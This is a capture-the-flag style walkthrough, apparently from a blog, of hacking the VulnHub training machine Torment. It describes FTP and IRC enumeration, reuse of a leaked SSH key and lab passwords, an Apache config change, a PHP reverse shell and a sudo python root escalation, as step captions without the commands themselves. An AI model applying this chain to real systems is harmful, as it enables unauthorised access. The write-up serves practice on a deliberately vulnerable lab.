Monday, January 3, 2022



- Layout for this exercise:


- The goal of this exercise is to develop a hacking process for the vulnerable machine Torment from the VulnHub pentesting platform.

- Torment can be downloaded from here:,299/

- Once downloaded Torment and extracted with VMware:


- netdiscover helps to identify Torment's IP

- Scanning with Nmap we see a lot of open ports:

- Going deeper with port 21 there is an Anonymous FTP server:

- Connecting to the FTP server:

- Looking for content, there are some hidden interesting directories:

- Most of the directories are empty, with the exception of .ngircd and .ssh.

- Getting channels from .ngircd:

- Getting id_rsa from .ssh:

- Transfers are successful:

- Reading channels:

- Reading id_rsa:


- ngircd is an IRC chat server that is listening at port 6667:

- To access ngircd we can use client HexChat:

- Installing HexChat:

- Launching HexChat:

- Adding server torment:

- Configuring torment at IP and port 6667 (important: uncheck tab Accept invalid SSL certificates). Also, using default password wealllikedebian:

- Connecting to server torment:

- Joining channel tormentedprinter:

- We have found this password for configuration purposes:


- CUPS is a printing server that is running at port 631:

- Connecting to the CUPS server at port 631:

- Clicking tab Printers we find a list of printing services users:

- Gathering all potential usernames:

- Msfconsole helps to enumerate SMTP service, passing file u and discovering that Patrick and Qiu are essential and real users:

- Also, we could know about Patrick and Qiu from Torment's login screen:

- SSH-ing as user Patrick, with id_rsa and password mostmachineshaveasupersercurekeyandalongpassphrase:

- Sudoer privileges for Patrick include poweroff and reboot services with command systemctl:


- Looking for files with write and execute permissions for all users, we find that apache2.conf is writable:

- Adding user qiu to Apache configuration:

- Now, let's use webshell php-reverse-shell.php, adapting it to our needs and renaming as myshell.php:

- Setting a web server at Kali:

- Transferring myshell.php from Kali to Torment:

- Executing /bin/sytemctl/reboot as a sudoer we ensure that user qiu runs service apache2:

- Setting a listener at port 1234:

- Running myshell.php:

- A reverse shell is triggered:

- We check that user qiu can run /usr/bin/python as a sudoer with root privileges and no password:

- Using qiu's sudoer privileges we get a root shell:


- Reading proof.txt: